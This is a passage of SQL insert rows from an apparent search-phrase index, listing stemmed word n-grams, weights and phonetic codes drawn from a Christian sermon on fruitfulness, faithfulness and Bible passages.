(270900, 'from results', 'from results', 0, 1, 1.4, 'F6562432', 1, '*'),
(270901, 'from results stop', 'from results stop', 0, 1, 1.5667, 'F656243231', 1, '*'),
(270902, 'from the throne', 'from the throne', 0, 1, 1.5, 'F65365', 1, '*'),
(270903, 'frowns', 'frown', 0, 0, 0.4, 'F652', 1, '*'),
(270904, 'frowns at', 'frown at', 0, 1, 1.3, 'F6523', 1, '*'),
(270905, 'frowns at an', 'frown at an', 0, 1, 1.4, 'F65235', 1, '*'),
(270906, 'fruit he', 'fruit he', 0, 1, 1.2667, 'F630', 1, '*'),
(270907, 'fruit he takes', 'fruit he takes', 0, 1, 1.4667, 'F632', 1, '*'),
(270908, 'fruit of evangelism', 'fruit of evangelism', 0, 1, 1.6333, 'F63152425', 1, '*'),
(270909, 'fruit of follow-up', 'fruit of follow-up', 0, 1, 1.6, 'F63141', 1, '*'),
(270910, 'fruit of intercession', 'fruit of intercession', 0, 1, 1.7, 'F63153625', 1, '*'),
(270911, 'fruit of knowledge', 'fruit of knowledge', 0, 1, 1.6, 'F63125432', 1, '*'),
(270912, 'fruit of righteousness', 'fruit of righteousness', 0, 1, 1.7333, 'F631623252', 1, '*'),
(270913, 'fruit of your', 'fruit of your', 0, 1, 1.4333, 'F6316', 1, '*'),
(270914, 'fruit so', 'fruit so', 0, 1, 1.2667, 'F632', 1, '*'),
(270915, 'fruit so that', 'fruit so that', 0, 1, 1.4333, 'F6323', 1, '*'),
(270916, 'fruit that', 'fruit that', 0, 1, 1.3333, 'F630', 1, '*'),
(270917, 'fruit that will', 'fruit that will', 0, 1, 1.5, 'F634', 1, '*'),
(270918, 'fruit to', 'fruit to', 0, 1, 1.2667, 'F630', 1, '*'),
(270919, 'fruit to their', 'fruit to their', 0, 1, 1.4667, 'F636', 1, '*'),
(270920, 'fruitful branches', 'fruit branches', 0, 1, 1.5667, 'F63141652', 1, '*'),
(270921, 'fruitful branches branches', 'fruit branches branches', 0, 1, 1.8667, 'F631416521652', 1, '*'),
(270922, 'fruits', 'fruit', 0, 0, 0.4, 'F632', 1, '*'),
(270923, 'fruits it', 'fruit it', 0, 1, 1.3, 'F6323', 1, '*'),
(270924, 'fruits it must', 'fruit it must', 0, 1, 1.4667, 'F6323523', 1, '*'),
(270925, 'fruits to', 'fruit to', 0, 1, 1.3, 'F6323', 1, '*'),
(270926, 'fruits to show', 'fruit to show', 0, 1, 1.4667, 'F63232', 1, '*'),
(270927, 'full of activities', 'full of activities', 0, 1, 1.6, 'F4123132', 1, '*'),
(270928, 'full of results', 'full of results', 0, 1, 1.5, 'F4162432', 1, '*'),
(270929, 'full potential', 'full potential', 0, 1, 1.4667, 'F413534', 1, '*'),
(270930, 'full potential john', 'full potential john', 0, 1, 1.6333, 'F41353425', 1, '*'),
(270931, 'gal 5 19-21', 'gal 5 19-21', 0, 1, 1.3667, 'G400', 1, '*'),
(270932, 'gather and', 'gather and', 0, 1, 1.3333, 'G3653', 1, '*'),
(270933, 'gather and it', 'gather and it', 0, 1, 1.4333, 'G3653', 1, '*'),
(270934, 'gather there', 'gather there', 0, 1, 1.4, 'G3636', 1, '*'),
(270935, 'gather there is', 'gather there is', 0, 1, 1.5, 'G36362', 1, '*'),
(270936, 'genesis 26', 'genesi 26', 0, 1, 1.3333, 'G520', 2, '*'),
(270937, 'genesis 26 18-isaac', 'genesi 26 18-isaac', 0, 1, 1.6333, 'G520', 1, '*'),
(270938, 'give fruit', 'give fruit', 0, 1, 1.3333, 'G163', 1, '*'),
(270939, 'give fruit to', 'give fruit to', 0, 1, 1.4333, 'G163', 1, '*'),
(270940, 'gives we', 'give we', 0, 1, 1.2667, 'G120', 1, '*'),
(270941, 'gives we gather', 'give we gather', 0, 1, 1.5, 'G1236', 1, '*'),
(270942, 'go for results', 'go for results', 0, 1, 1.4667, 'G162432', 1, '*'),
(270943, 'go for the', 'go for the', 0, 1, 1.3333, 'G163', 1, '*'),
(270944, 'god depend', 'god depend', 0, 1, 1.3333, 'G3153', 1, '*'),
(270945, 'god depend on', 'god depend on', 0, 1, 1.4333, 'G31535', 1, '*'),
(270946, 'god frowns', 'god frowns', 0, 1, 1.3333, 'G31652', 1, '*'),
(270947, 'god frowns at', 'god frowns at', 0, 1, 1.4333, 'G316523', 1, '*'),
(270948, 'god gives we', 'god gives we', 0, 1, 1.4, 'G3212', 1, '*'),
(270949, 'god is coming', 'god is coming', 0, 1, 1.4333, 'G3252', 1, '*'),
(270950, 'god is looking', 'god is looking', 0, 1, 1.4667, 'G324252', 2, '*'),
(270951, 'god judges', 'god judges', 0, 1, 1.3333, 'G3232', 1, '*'),
(270952, 'god judges in', 'god judges in', 0, 1, 1.4333, 'G32325', 1, '*'),
(270953, 'god rewards', 'god rewards', 0, 1, 1.3667, 'G3632', 1, '*'),
(270954, 'god rewards faithfulness', 'god rewards faithfulness', 0, 1, 1.8, 'G3632131452', 1, '*'),
(270955, 'god there if', 'god there if', 0, 1, 1.4, 'G361', 1, '*'),
(270956, 'god was doing', 'god was doing', 0, 1, 1.4333, 'G32352', 1, '*'),
(270957, 'god was preparing', 'god was preparing', 0, 1, 1.5667, 'G32161652', 1, '*'),
(270958, 'god\'s purpose', 'god purpose', 0, 1, 1.4333, 'G321612', 1, '*'),
(270959, 'god\'s purpose it\'s', 'god purpose it', 0, 1, 1.6, 'G32161232', 1, '*'),
(270960, 'grace ability', 'grace ability', 0, 1, 1.4333, 'G62143', 1, '*'),
(270961, 'grace ability and', 'grace ability and', 0, 1, 1.5667, 'G6214353', 1, '*'),
(270962, 'grace and', 'grace and', 0, 1, 1.3, 'G6253', 1, '*'),
(270963, 'grace and special', 'grace and special', 0, 1, 1.5667, 'G62532124', 1, '*'),
(270964, 'had dug', 'had dug', 0, 1, 1.2333, 'H320', 1, '*'),
(270965, 'had dug before', 'had dug before', 0, 1, 1.4667, 'H3216', 1, '*'),
(270966, 'had no', 'had no', 0, 1, 1.2, 'H350', 1, '*'),
(270967, 'had no contribution', 'had no contribution', 0, 1, 1.6333, 'H352536135', 1, '*'),
(270968, 'had only', 'had only', 0, 1, 1.2667, 'H354', 1, '*'),
(270969, 'had only leaves', 'had only leaves', 0, 1, 1.5, 'H35412', 1, '*'),
(270970, 'had the life', 'had the life', 0, 1, 1.4, 'H341', 1, '*'),
(270971, 'had the outlook', 'had the outlook', 0, 1, 1.5, 'H342', 1, '*'),
(270972, 'had to curse', 'had to curse', 0, 1, 1.4, 'H3262', 1, '*'),
(270973, 'harvest is', 'harvest is', 0, 1, 1.3333, 'H61232', 1, '*'),
(270974, 'harvest is plentiful', 'harvest is plentiful', 0, 1, 1.6667, 'H61232145314', 1, '*'),
(270975, 'harvest of', 'harvest of', 0, 1, 1.3333, 'H61231', 1, '*'),
(270976, 'harvest of multitude', 'harvest of multitude', 0, 1, 1.6667, 'H61231543', 1, '*'),
(270977, 'has its', 'ha its', 0, 1, 1.2333, 'H232', 1, '*'),
(270978, 'has its strategy', 'ha its strategy', 0, 1, 1.5333, 'H2323632', 1, '*'),
(270979, 'have fruitful', 'have fruitful', 0, 1, 1.4333, 'H16314', 1, '*'),
(270980, 'have fruitful branches', 'have fruitful branches', 0, 1, 1.7333, 'H163141652', 1, '*'),
(270981, 'have vine', 'have vine', 0, 1, 1.3, 'H150', 1, '*'),
(270982, 'have vine branches', 'have vine branches', 0, 1, 1.6, 'H151652', 1, '*'),
(270983, 'he calls them', 'he calls them', 0, 1, 1.4333, 'H24235', 1, '*'),
(270984, 'he chased', 'he chased', 0, 1, 1.3, 'H230', 1, '*'),
(270985, 'he chased his', 'he chased his', 0, 1, 1.4333, 'H232', 1, '*'),
(270986, 'he dug', 'he dug', 0, 1, 1.2, 'H320', 1, '*'),
(270987, 'he dug the', 'he dug the', 0, 1, 1.3333, 'H323', 1, '*'),
(270988, 'he had no', 'he had no', 0, 1, 1.3, 'H350', 1, '*'),
(270989, 'he is not', 'he is not', 0, 1, 1.3, 'H253', 2, '*'),
(270990, 'he takes', 'he takes', 0, 1, 1.2667, 'H320', 1, '*'),
(270991, 'he takes special', 'he takes special', 0, 1, 1.5333, 'H32124', 1, '*'),
(270992, 'heart of', 'heart of', 0, 1, 1.2667, 'H631', 1, '*'),
(270993, 'heart of all', 'heart of all', 0, 1, 1.4, 'H6314', 1, '*'),
(270994, 'heavenly trust', 'heavenli trust', 0, 1, 1.4667, 'H1543623', 1, '*'),
(270995, 'heavenly trust in', 'heavenli trust in', 0, 1, 1.5667, 'H15436235', 1, '*'),
(270996, 'himself in', 'himself in', 0, 1, 1.3333, 'H52415', 1, '*'),
(270997, 'himself in his', 'himself in his', 0, 1, 1.4667, 'H524152', 1, '*'),
(270998, 'himself to', 'himself to', 0, 1, 1.3333, 'H52413', 1, '*'),
(270999, 'himself to pray', 'himself to pray', 0, 1, 1.5, 'H5241316', 1, '*'),
(271000, 'his children produce', 'hi children produce', 0, 1, 1.6667, 'H243651632', 1, '*'),
(271001, 'his father', 'hi father', 0, 1, 1.3333, 'H2136', 1, '*'),
(271002, 'his father called', 'hi father called', 0, 1, 1.5667, 'H2136243', 1, '*'),
(271003, 'his father from', 'hi father from', 0, 1, 1.5, 'H2136165', 1, '*'),
(271004, 'his father had', 'hi father had', 0, 1, 1.4667, 'H21363', 1, '*'),
(271005, 'his father received', 'hi father received', 0, 1, 1.6333, 'H2136213', 1, '*'),
(271006, 'his father\'s', 'hi father', 0, 1, 1.4, 'H21362', 1, '*'),
(271007, 'his father\'s house', 'hi father house', 0, 1, 1.6, 'H21362', 1, '*'),
(271008, 'his own its', 'hi own its', 0, 1, 1.3667, 'H2532', 1, '*'),
(271009, 'holiness the', 'holi the', 0, 1, 1.4, 'H4523', 1, '*'),
(271010, 'holiness the fruit', 'holi the fruit', 0, 1, 1.6, 'H4523163', 1, '*'),
(271011, 'house 2', 'hous 2', 0, 1, 1.2333, 'H200', 2, '*'),
(271012, 'house 2 samuel', 'hous 2 samuel', 0, 1, 1.4667, 'H254', 1, '*'),
(271013, 'house solomon', 'hous solomon', 0, 1, 1.4333, 'H245', 1, '*'),
(271014, 'house solomon built', 'hous solomon built', 0, 1, 1.6333, 'H245143', 1, '*'),
(271015, 'in 2 samuel', 'in 2 samuel', 0, 1, 1.3667, 'I5254', 1, '*'),
(271016, 'in acts', 'in acts', 0, 1, 1.2333, 'I5232', 1, '*'),
(271017, 'in acts 4', 'in acts 4', 0, 1, 1.3, 'I5232', 1, '*'),
(271018, 'in his father\'s', 'in his father', 0, 1, 1.5, 'I521362', 1, '*'),
(271019, 'in love avoid', 'in love avoid', 0, 1, 1.4333, 'I5413', 1, '*'),
(271020, 'in saul', 'in saul', 0, 1, 1.2333, 'I524', 1, '*'),
(271021, 'in saul was', 'in saul was', 0, 1, 1.3667, 'I5242', 1, '*'),
(271022, 'in this end', 'in this end', 0, 1, 1.3667, 'I53253', 1, '*'),
(271023, 'in you separate', 'in you separate', 0, 1, 1.5, 'I52163', 1, '*'),
(271024, 'in your day', 'in your day', 0, 1, 1.3667, 'I563', 1, '*'),
(271025, 'in your father\'s', 'in your father', 0, 1, 1.5333, 'I561362', 1, '*'),
(271026, 'intercession is', 'intercess is', 0, 1, 1.5, 'I536252', 1, '*'),
(271027, 'intercession is divine', 'intercess is divine', 0, 1, 1.7333, 'I536252315', 1, '*'),
(271028, 'interruption', 'interrupt', 0, 0, 0.8, 'I536135', 1, '*'),
(271029, 'interruption the', 'interrupt the', 0, 1, 1.5333, 'I5361353', 1, '*'),
(271030, 'interruption the fruit', 'interrupt the fruit', 0, 1, 1.7333, 'I5361353163', 1, '*'),
(271031, 'intervention and', 'intervent and', 0, 1, 1.5333, 'I53615353', 1, '*'),
(271032, 'intervention and interruption', 'intervent and interruption', 0, 1, 1.9667, 'I53615353536135', 1, '*'),
(271033, 'is a destiny', 'is a destiny', 0, 1, 1.4, 'I23235', 1, '*'),
(271034, 'is an assignment', 'is an assignment', 0, 1, 1.5333, 'I25253', 1, '*'),
(271035, 'is battle', 'is battle', 0, 1, 1.3, 'I2134', 1, '*'),
(271036, 'is battle 5', 'is battle 5', 0, 1, 1.3667, 'I2134', 1, '*'),
(271037, 'is coming also', 'is coming also', 0, 1, 1.4667, 'I25242', 1, '*'),
(271038, 'is coming for', 'is coming for', 0, 1, 1.4333, 'I25216', 1, '*'),
(271039, 'is divine intervention', 'is divine intervention', 0, 1, 1.7333, 'I2315361535', 1, '*'),
(271040, 'is filled', 'is filled', 0, 1, 1.3, 'I2143', 1, '*'),
(271041, 'is filled with', 'is filled with', 0, 1, 1.4667, 'I2143', 1, '*'),
(271042, 'is holiness', 'is holiness', 0, 1, 1.3667, 'I2452', 1, '*'),
(271043, 'is holiness the', 'is holiness the', 0, 1, 1.5, 'I24523', 1, '*'),
(271044, 'is membership', 'is membership', 0, 1, 1.4333, 'I251621', 1, '*'),
(271045, 'is membership the', 'is membership the', 0, 1, 1.5667, 'I2516213', 1, '*'),
(271046, 'is plentiful', 'is plentiful', 0, 1, 1.4, 'I2145314', 1, '*'),
(271047, 'is plentiful but', 'is plentiful but', 0, 1, 1.5333, 'I214531413', 1, '*'),
(271048, 'is salvation', 'is salvation', 0, 1, 1.4, 'I24135', 1, '*'),
(271049, 'is salvation of', 'is salvation of', 0, 1, 1.5, 'I241351', 1, '*'),
(271050, 'is understanding', 'is understanding', 0, 1, 1.5333, 'I2536235352', 1, '*'),
(271051, 'is understanding the', 'is understanding the', 0, 1, 1.6667, 'I25362353523', 1, '*'),
(271052, 'is wisdom to', 'is wisdom to', 0, 1, 1.4, 'I2353', 1, '*'),
(271053, 'is your grace', 'is your grace', 0, 1, 1.4333, 'I26262', 1, '*'),
(271054, 'israel came', 'israel came', 0, 1, 1.3667, 'I26425', 1, '*'),
(271055, 'israel came to', 'israel came to', 0, 1, 1.4667, 'I264253', 1, '*'),
(271056, 'israelites he', 'israelit he', 0, 1, 1.4333, 'I26432', 1, '*'),
(271057, 'israelites he chased', 'israelit he chased', 0, 1, 1.6667, 'I264323', 1, '*'),
(271058, 'it a christian', 'it a christian', 0, 1, 1.4667, 'I326235', 1, '*'),
(271059, 'it takes wisdom', 'it takes wisdom', 0, 1, 1.5, 'I3235', 1, '*'),
(271060, 'it the fruit', 'it the fruit', 0, 1, 1.4, 'I3163', 1, '*'),
(271061, 'it took', 'it took', 0, 1, 1.2333, 'I320', 1, '*'),
(271062, 'it took prayers', 'it took prayers', 0, 1, 1.5, 'I32162', 1, '*'),
(271063, 'it\'s not', 'it not', 0, 1, 1.2667, 'I3253', 2, '*'),
(271064, 'it\'s not enough', 'it not enough', 0, 1, 1.5, 'I325352', 1, '*'),
(271065, 'it\'s the results', 'it the results', 0, 1, 1.5333, 'I32362432', 1, '*'),
(271066, 'item 17', 'item 17', 0, 1, 1.2333, 'I350', 1, '*'),
(271067, 'item 17 becoming', 'item 17 becoming', 0, 1, 1.5333, 'I351252', 1, '*'),
(271068, 'its a', 'it a', 0, 1, 1.1667, 'I320', 1, '*'),
(271069, 'its a strange', 'it a strange', 0, 1, 1.4333, 'I323652', 1, '*'),
(271070, 'its strategy', 'it strategy', 0, 1, 1.4, 'I323632', 1, '*'),
(271071, 'its strategy 4', 'it strategy 4', 0, 1, 1.4667, 'I323632', 1, '*'),
(271072, 'jesus had', 'jesu had', 0, 1, 1.3, 'J300', 1, '*'),
(271073, 'jesus had to', 'jesu had to', 0, 1, 1.4, 'J300', 1, '*'),
(271074, 'jesus withdrew', 'jesu withdrew', 0, 1, 1.4667, 'J360', 1, '*'),
(271075, 'jesus withdrew himself', 'jesu withdrew himself', 0, 1, 1.7333, 'J365241', 1, '*'),
(271076, 'john 15 1-2', 'john 15 1-2', 0, 1, 1.3667, 'J500', 1, '*'),
(271077, 'john 15 4-5', 'john 15 4-5', 0, 1, 1.3667, 'J500', 1, '*'),
(271078, 'john 15 8', 'john 15 8', 0, 1, 1.3, 'J500', 1, '*'),
(271079, 'judge only', 'judg only', 0, 1, 1.3333, 'J3254', 1, '*'),
(271080, 'judge only the', 'judg only the', 0, 1, 1.4667, 'J32543', 1, '*'),
(271081, 'judges', 'judg', 0, 0, 0.4, 'J320', 1, '*'),
(271082, 'judges in', 'judg in', 0, 1, 1.3, 'J325', 1, '*'),
(271083, 'judges in 2', 'judg in 2', 0, 1, 1.3667, 'J325', 1, '*'),
(271084, 'just have', 'just have', 0, 1, 1.3, 'J310', 1, '*'),
(271085, 'just have vine', 'just have vine', 0, 1, 1.4667, 'J315', 1, '*'),
(271086, 'k2 item 17', 'k2 item 17', 0, 1, 1.3333, 'K350', 1, '*'),
(271087, 'king over', 'king over', 0, 1, 1.3, 'K5216', 1, '*'),
(271088, 'king over them', 'king over them', 0, 1, 1.4667, 'K521635', 1, '*'),
(271089, 'kings 6', 'king 6', 0, 1, 1.2333, 'K520', 1, '*'),
(271090, 'kings 6 38', 'king 6 38', 0, 1, 1.3333, 'K520', 1, '*'),
(271091, 'kings 8', 'king 8', 0, 1, 1.2333, 'K520', 1, '*'),
(271092, 'kings 8 10-11', 'king 8 10-11', 0, 1, 1.4333, 'K520', 1, '*'),
(271093, 'knowing the', 'know the', 0, 1, 1.3667, 'K523', 1, '*'),
(271094, 'knowing the right', 'know the right', 0, 1, 1.5667, 'K523623', 1, '*'),
(271095, 'knowledge is', 'knowledg is', 0, 1, 1.4, 'K5432', 1, '*'),
(271096, 'knowledge is understanding', 'knowledg is understanding', 0, 1, 1.8667, 'K5432536235352', 1, '*'),
(271097, 'knows that', 'know that', 0, 1, 1.3333, 'K523', 2, '*'),
(271098, 'knows that they', 'know that they', 0, 1, 1.5, 'K523', 1, '*'),
(271099, 'labour to', 'labour to', 0, 1, 1.3, 'L163', 1, '*'),
(271100, 'labour to yield', 'labour to yield', 0, 1, 1.5, 'L16343', 1, '*'),
(271101, 'labourers', 'labour', 0, 0, 0.6, 'L162', 1, '*'),
(271102, 'labourers are', 'labour are', 0, 1, 1.4333, 'L1626', 1, '*'),
(271103, 'labourers are few', 'labour are few', 0, 1, 1.5667, 'L16261', 1, '*'),
(271104, 'last may', 'last may', 0, 1, 1.2667, 'L235', 1, '*'),
(271105, 'last may you', 'last may you', 0, 1, 1.4, 'L235', 1, '*'),
(271106, 'leader god', 'leader god', 0, 1, 1.3333, 'L3623', 1, '*'),
(271107, 'leader god was', 'leader god was', 0, 1, 1.4667, 'L36232', 1, '*'),
(271108, 'leader on', 'leader on', 0, 1, 1.3, 'L365', 1, '*'),
(271109, 'leader on the', 'leader on the', 0, 1, 1.4333, 'L3653', 1, '*'),
(271110, 'leading a', 'lead a', 0, 1, 1.3, 'L352', 1, '*'),
(271111, 'leading a committee', 'lead a committee', 0, 1, 1.6333, 'L35253', 1, '*'),
(271112, 'leaves but', 'leav but', 0, 1, 1.3333, 'L1213', 1, '*'),
(271113, 'leaves but without', 'leav but without', 0, 1, 1.6, 'L1213', 1, '*'),
(271114, 'led them', 'led them', 0, 1, 1.2667, 'L350', 1, '*'),
(271115, 'led them out', 'led them out', 0, 1, 1.4, 'L353', 1, '*'),
(271116, 'life 3', 'life 3', 0, 1, 1.2, 'L100', 1, '*'),
(271117, 'life 3 wisdom', 'life 3 wisdom', 0, 1, 1.4333, 'L1235', 1, '*'),
(271118, 'looking for reapers', 'look for reapers', 0, 1, 1.6333, 'L25216162', 1, '*'),
(271119, 'lord came', 'lord came', 0, 1, 1.3, 'L6325', 2, '*'),
(271120, 'lord came unto', 'lord came unto', 0, 1, 1.4667, 'L63253', 1, '*'),
(271121, 'lord is coming', 'lord is coming', 0, 1, 1.4667, 'L63252', 1, '*'),
(271122, 'lord whenever their', 'lord whenever their', 0, 1, 1.6333, 'L6351636', 1, '*'),
(271123, 'love avoid', 'love avoid', 0, 1, 1.3333, 'L130', 1, '*'),
(271124, 'love avoid the', 'love avoid the', 0, 1, 1.4667, 'L130', 1, '*'),
(271125, 'love that bring', 'love that bring', 0, 1, 1.5, 'L131652', 1, '*'),
(271126, 'luke 13', 'luke 13', 0, 1, 1.2333, 'L200', 1, '*'),
(271127, 'luke 13 6-9', 'luke 13 6-9', 0, 1, 1.3667, 'L200', 1, '*'),
(271128, 'luke 16', 'luke 16', 0, 1, 1.2333, 'L200', 1, '*'),
(271129, 'luke 16 10-12', 'luke 16 10-12', 0, 1, 1.4333, 'L200', 1, '*'),
(271130, 'luke 19 20-24', 'luke 19 20-24', 0, 1, 1.4333, 'L200', 1, '*'),
(271131, 'luke 5', 'luke 5', 0, 1, 1.2, 'L200', 1, '*'),
(271132, 'luke 5 16-24', 'luke 5 16-24', 0, 1, 1.4, 'L200', 1, '*'),
(271133, 'major miracle', 'major miracle', 0, 1, 1.4333, 'M265624', 1, '*'),
(271134, 'major miracle always', 'major miracle always', 0, 1, 1.6667, 'M2656242', 1, '*'),
(271135, 'makes you distinct', 'make you distinct', 0, 1, 1.6, 'M2323523', 1, '*'),
(271136, 'mark 1', 'mark 1', 0, 1, 1.2, 'M620', 2, '*'),
(271137, 'mark 1 35-42', 'mark 1 35-42', 0, 1, 1.4, 'M620', 1, '*'),
(271138, 'material you', 'materi you', 0, 1, 1.4, 'M364', 1, '*'),
(271139, 'material you must', 'materi you must', 0, 1, 1.5667, 'M364523', 1, '*'),
(271140, 'matthew 24', 'matthew 24', 0, 1, 1.3333, 'M300', 1, '*'),
(271141, 'matthew 24 45-47', 'matthew 24 45-47', 0, 1, 1.5333, 'M300', 1, '*'),
(271142, 'matthew 25', 'matthew 25', 0, 1, 1.3333, 'M300', 1, '*'),
(271143, 'matthew 25 14-30', 'matthew 25 14-30', 0, 1, 1.5333, 'M300', 1, '*'),
(271144, 'membership is', 'membership is', 0, 1, 1.4333, 'M16212', 1, '*'),
(271145, 'membership is a', 'membership is a', 0, 1, 1.5, 'M16212', 1, '*'),
(271146, 'membership the', 'membership the', 0, 1, 1.4667, 'M16213', 1, '*'),
(271147, 'membership the fruit', 'membership the fruit', 0, 1, 1.6667, 'M16213163', 1, '*'),
(271148, 'men see', 'men see', 0, 1, 1.2333, 'M200', 1, '*'),
(271149, 'men see but', 'men see but', 0, 1, 1.3667, 'M213', 1, '*'),
(271150, 'method', 'method', 0, 0, 0.4, 'M300', 1, '*'),
(271151, 'method and', 'method and', 0, 1, 1.3333, 'M353', 1, '*'),
(271152, 'method and the', 'method and the', 0, 1, 1.4667, 'M353', 1, '*'),
(271153, 'miracle', 'miracl', 0, 0, 0.4667, 'M624', 1, '*'),
(271154, 'miracle always', 'miracl always', 0, 1, 1.4667, 'M6242', 1, '*'),
(271155, 'miracle always follows', 'miracl always follows', 0, 1, 1.7333, 'M6242142', 1, '*'),
(271156, 'monument', 'monument', 0, 0, 0.5333, 'M300', 1, '*'),
(271157, 'monument for', 'monument for', 0, 1, 1.4, 'M316', 1, '*'),
(271158, 'monument for himself', 'monument for himself', 0, 1, 1.6667, 'M3165241', 1, '*'),
(271159, 'more he', 'more he', 0, 1, 1.2333, 'M600', 1, '*'),
(271160, 'more he does', 'more he does', 0, 1, 1.4, 'M632', 1, '*'),
(271161, 'multitude', 'multitud', 0, 0, 0.6, 'M430', 1, '*'),
(271162, 'multitude of', 'multitud of', 0, 1, 1.4, 'M431', 1, '*'),
(271163, 'multitude of believers', 'multitud of believers', 0, 1, 1.7333, 'M4314162', 1, '*'),
(271164, 'must be committed', 'must be committed', 0, 1, 1.5667, 'M231253', 1, '*'),
(271165, 'must be done', 'must be done', 0, 1, 1.4, 'M23135', 1, '*'),
(271166, 'must be sure', 'must be sure', 0, 1, 1.4, 'M23126', 1, '*'),
(271167, 'names that', 'name that', 0, 1, 1.3333, 'N230', 1, '*'),
(271168, 'names that his', 'name that his', 0, 1, 1.4667, 'N232', 1, '*'),
(271169, 'need faithfulness', 'need faithfulness', 0, 1, 1.5667, 'N3131452', 1, '*'),
(271170, 'need faithfulness to', 'need faithfulness to', 0, 1, 1.6667, 'N31314523', 1, '*'),
(271171, 'new wells', 'new wells', 0, 1, 1.3, 'N420', 1, '*'),
(271172, 'new wells he', 'new wells he', 0, 1, 1.4, 'N420', 1, '*'),
(271173, 'no contribution', 'no contribution', 0, 1, 1.5, 'N2536135', 1, '*'),
(271174, 'no contribution to', 'no contribution to', 0, 1, 1.6, 'N25361353', 1, '*'),
(271175, 'not an absalom', 'not an absalom', 0, 1, 1.4667, 'N351245', 1, '*'),
(271176, 'not be a', 'not be a', 0, 1, 1.2667, 'N310', 1, '*'),
(271177, 'not coming to', 'not coming to', 0, 1, 1.4333, 'N32523', 1, '*'),
(271178, 'not dig', 'not dig', 0, 1, 1.2333, 'N320', 1, '*'),
(271179, 'not dig new', 'not dig new', 0, 1, 1.3667, 'N325', 1, '*'),
(271180, 'not disappoint the', 'not disappoint the', 0, 1, 1.6, 'N32153', 1, '*'),
(271181, 'not enough that', 'not enough that', 0, 1, 1.5, 'N3523', 1, '*'),
(271182, 'not eye', 'not eye', 0, 1, 1.2333, 'N300', 1, '*'),
(271183, 'not eye service', 'not eye service', 0, 1, 1.5, 'N32612', 1, '*'),
(271184, 'not facefulness', 'not facefulness', 0, 1, 1.5, 'N3121452', 1, '*'),
(271185, 'not facefulness matthew', 'not facefulness matthew', 0, 1, 1.7667, 'N312145253', 1, '*'),
(271186, 'not only be', 'not only be', 0, 1, 1.3667, 'N3541', 1, '*'),
(271187, 'not want to', 'not want to', 0, 1, 1.3667, 'N353', 1, '*'),
(271188, 'not work', 'not work', 0, 1, 1.2667, 'N362', 1, '*'),
(271189, 'not work for', 'not work for', 0, 1, 1.4, 'N36216', 1, '*'),
(271190, 'nothing to show', 'noth to show', 0, 1, 1.5, 'N35232', 1, '*'),
(271191, 'occupied', 'occupi', 0, 0, 0.5333, 'O213', 1, '*'),
(271192, 'occupied by', 'occupi by', 0, 1, 1.3667, 'O2131', 1, '*'),
(271193, 'occupied by activities', 'occupi by activities', 0, 1, 1.7333, 'O213123132', 1, '*'),
(271194, 'of activities', 'of activities', 0, 1, 1.4333, 'O123132', 1, '*'),
(271195, 'of activities but', 'of activities but', 0, 1, 1.5667, 'O12313213', 1, '*'),
(271196, 'of all israelites', 'of all israelites', 0, 1, 1.5667, 'O1426432', 1, '*'),
(271197, 'of assignments', 'of assignments', 0, 1, 1.4667, 'O12532', 1, '*'),
(271198, 'of assignments don\'t', 'of assignments don', 0, 1, 1.6667, 'O12532353', 1, '*'),
(271199, 'of believers', 'of believers', 0, 1, 1.4, 'O14162', 1, '*'),
(271200, 'of believers for', 'of believers for', 0, 1, 1.5333, 'O1416216', 1, '*'),
(271201, 'of christ today', 'of christ today', 0, 1, 1.5, 'O12623', 1, '*'),
(271202, 'of evangelism', 'of evangelism', 0, 1, 1.4333, 'O152425', 1, '*'),
(271203, 'of evangelism is', 'of evangelism is', 0, 1, 1.5333, 'O1524252', 1, '*'),
(271204, 'of follow-up', 'of follow-up', 0, 1, 1.4, 'O141', 1, '*'),
(271205, 'of follow-up is', 'of follow-up is', 0, 1, 1.5, 'O1412', 1, '*'),
(271206, 'of intercession is', 'of intercession is', 0, 1, 1.6, 'O1536252', 1, '*'),
(271207, 'of israel came', 'of israel came', 0, 1, 1.4667, 'O126425', 1, '*'),
(271208, 'of knowledge is', 'of knowledge is', 0, 1, 1.5, 'O125432', 1, '*'),
(271209, 'of love that', 'of love that', 0, 1, 1.4, 'O1413', 1, '*'),
(271210, 'of multitude', 'of multitude', 0, 1, 1.4, 'O1543', 1, '*'),
(271211, 'of multitude of', 'of multitude of', 0, 1, 1.5, 'O15431', 1, '*'),
(271212, 'of results', 'of results', 0, 1, 1.3333, 'O162432', 1, '*'),
(271213, 'of righteousness is', 'of righteousness is', 0, 1, 1.6333, 'O1623252', 1, '*'),
(271214, 'of souls', 'of souls', 0, 1, 1.2667, 'O1242', 1, '*'),
(271215, 'of souls the', 'of souls the', 0, 1, 1.4, 'O12423', 1, '*'),
(271216, 'of the apostles', 'of the apostles', 0, 1, 1.5, 'O1312342', 1, '*'),
(271217, 'of your church', 'of your church', 0, 1, 1.4667, 'O16262', 1, '*'),
(271218, 'of your grace', 'of your grace', 0, 1, 1.4333, 'O16262', 1, '*'),
(271219, 'on the throne', 'on the throne', 0, 1, 1.4333, 'O5365', 1, '*'),
(271220, 'on youas', 'on youas', 0, 1, 1.2667, 'O520', 1, '*'),
(271221, 'on youas a', 'on youas a', 0, 1, 1.3333, 'O520', 1, '*'),
(271222, 'one that led', 'on that led', 0, 1, 1.4, 'O5343', 1, '*'),
(271223, 'only be full', 'onli be full', 0, 1, 1.4, 'O5414', 1, '*'),
(271224, 'only leaves', 'onli leaves', 0, 1, 1.3667, 'O5412', 1, '*'),
(271225, 'only leaves but', 'onli leaves but', 0, 1, 1.5, 'O541213', 1, '*'),
(271226, 'only the sinners', 'onli the sinners', 0, 1, 1.5333, 'O5432562', 1, '*'),
(271227, 'or that', 'or that', 0, 1, 1.2333, 'O630', 1, '*'),
(271228, 'or that there', 'or that there', 0, 1, 1.4333, 'O636', 1, '*'),
(271229, 'out and in', 'out and in', 0, 1, 1.3333, 'O3535', 1, '*'),
(271230, 'outlook', 'outlook', 0, 0, 0.4667, 'O342', 1, '*'),
(271231, 'outlook but', 'outlook but', 0, 1, 1.3667, 'O34213', 1, '*'),
(271232, 'outlook but david', 'outlook but david', 0, 1, 1.5667, 'O3421313', 1, '*'),
(271233, 'over them he', 'over them he', 0, 1, 1.4, 'O1635', 1, '*'),
(271234, 'own its', 'own its', 0, 1, 1.2333, 'O532', 1, '*'),
(271235, 'own its a', 'own its a', 0, 1, 1.3, 'O532', 1, '*'),
(271236, 'pattern', 'pattern', 0, 0, 0.4667, 'P365', 1, '*'),
(271237, 'pattern that', 'pattern that', 0, 1, 1.4, 'P3653', 1, '*'),
